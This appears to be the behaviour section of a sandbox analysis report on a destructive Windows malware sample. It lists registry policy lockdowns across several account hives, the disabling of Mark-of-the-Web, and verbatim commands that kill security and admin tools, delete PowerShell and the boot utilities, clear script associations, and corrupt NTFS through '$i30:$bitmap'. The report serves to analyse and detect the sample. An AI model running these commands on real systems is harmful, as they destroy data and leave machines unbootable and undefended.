Technical Information
- [<HKCU>\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\condrv\kernalconn...
- [\REGISTRY\USER\S-1-5-19\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
- [\REGISTRY\USER\S-1-5-20\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
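- [\REGISTRY\USER\S-1-5-18\Software\Microsoft\Command Processor] 'AutoRun' = 'echo. && echo The command prompt has been disabled by your administrator. && echo. && pause && \\.\Globalroot\device\...
  Note: cmd.exe runs the Command Processor 'AutoRun' value each time it starts (unless launched with /D), so every command prompt opened under these hives prints the "disabled by your administrator" message written by the sample. The values are truncated in this report. S-1-5-18, S-1-5-19 and S-1-5-20 are the LocalSystem, LocalService and NetworkService accounts.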
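- (The sub-headings for the next six items are missing from this copy; they appear to name the display settings and system tools the sample interferes with.)
- hidden files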
- file extensions
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- Windows Defender
- User Account Control (UAC)
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
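- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
  Note: 03FFFFFF sets all 26 drive-letter bits (A: to Z:), so 'NoDrives' hides every drive in Explorer and 'NoViewOnDrive' blocks browsing into them; the same two values are set in each hive listed here.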
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMyMusic' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoUserNameInStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoCommonGroups' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSecurityTab' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoChangeStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = '03FFFFFF'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFavoritesMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoActiveDesktop' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoInternetIcon' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMFUprogramsList' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuMorePrograms' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuPinnedList' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSimpleStartMenu' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoTrayItemsDisplay' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetTaskbar' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMHelp' = '00000001'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogoff' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSaveSettings' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoStartMenuSubFolders' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoNetHood' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoAddPrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDeletePrinter' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyDocs' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSMMyPictures' = '00000001'
- Hides taskbar notifications
- '%WINDIR%\syswow64\taskkill.exe' /f /im edge.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im mmc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im taskmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im processhacker.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im processexplorer.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im iexplore.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im chrome.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im powershell.exe
- iexplore.exe
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- [\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
- [\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
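- [\REGISTRY\USER\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
  Note: 'SaveZoneInformation' = 1 tells Attachment Manager not to record zone information (the Mark of the Web) on saved attachments and downloads, so checks that depend on that marker do not apply to files saved after the change.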
- %WINDIR%\syswow64\temp\shutdowncounter.txt
- %WINDIR%\syswow64\temp\shutdowncounter.txt
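- (Heading missing in this copy; the PowerShell files below sit in the folder targeted by the 'del /s /f /q "<SYSTEM32>\WindowsPowerShell\v1.0"' command listed further down, so this is presumably the list of deleted files.)
- %WINDIR%\syswow64\windowspowershell\v1.0\certificate.format.ps1xml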
- %WINDIR%\syswow64\windowspowershell\v1.0\examples\profile.ps1
- %WINDIR%\syswow64\windowspowershell\v1.0\wsman.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\types.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\registry.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\pwrshsip.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\pwrshmsg.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\pspluginwkr.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\psevents.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\modules\psdiagnostics\psdiagnostics.psd1
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell_ise.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe
- %WINDIR%\syswow64\windowspowershell\v1.0\help.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\getevent.types.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\compiledcomposition.microsoft.powershell.gpowershell.dll
- %WINDIR%\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml
- %WINDIR%\syswow64\windowspowershell\v1.0\modules\psdiagnostics\psdiagnostics.psm1
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q <SYSTEM32>\Temp
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bootsect.exe /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bootsect.exe /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bcdboot.exe
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bcdedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c del /f /q <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im powershell.exe
- '%WINDIR%\syswow64\cmd.exe' /c takeown /F "%ProgramFiles%\WindowsPowerShell" /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /F "%ProgramFiles%\WindowsPowerShell" /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls "%ProgramFiles%\WindowsPowerShell" /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' "%ProgramFiles%\WindowsPowerShell" /grant user:F
- '%WINDIR%\syswow64\attrib.exe' +r +s +h <SYSTEM32>\Temp
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "%ProgramFiles%\WindowsPowerShell"
- '%WINDIR%\syswow64\cmd.exe' /c takeown /F "<SYSTEM32>\WindowsPowerShell\v1.0" /R /D Y
- '%WINDIR%\syswow64\takeown.exe' /F "<SYSTEM32>\WindowsPowerShell\v1.0" /R /D Y
- '%WINDIR%\syswow64\cmd.exe' /c icacls "<SYSTEM32>\WindowsPowerShell\v1.0" /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' "<SYSTEM32>\WindowsPowerShell\v1.0" /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c del /s /f /q "<SYSTEM32>\WindowsPowerShell\v1.0"
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q "<SYSTEM32>\WindowsPowerShell\v1.0"
- '%WINDIR%\syswow64\cmd.exe' /c assoc .vbs=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .bat=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .inf=
- '%WINDIR%\syswow64\cmd.exe' /c assoc .ps1=
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bcdedit.exe /grant %Username%:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bcdedit.exe /grant user:F
- '%WINDIR%\syswow64\icacls.exe' <SYSTEM32>\bcdboot.exe /grant user:F
- '%WINDIR%\syswow64\cmd.exe' /c icacls <SYSTEM32>\bcdboot.exe /grant %Username%:F
- '%WINDIR%\syswow64\takeown.exe' /f <SYSTEM32>\bootsect.exe
- '%WINDIR%\syswow64\cmd.exe' /c rd /s /q C:\Users\Public\Desktop
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im edge.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im mmc.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im taskmgr.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im processhacker.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im processexplorer.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im iexplore.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe
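- '%WINDIR%\syswow64\cmd.exe' /c cd C:\:$i30:$bitmap
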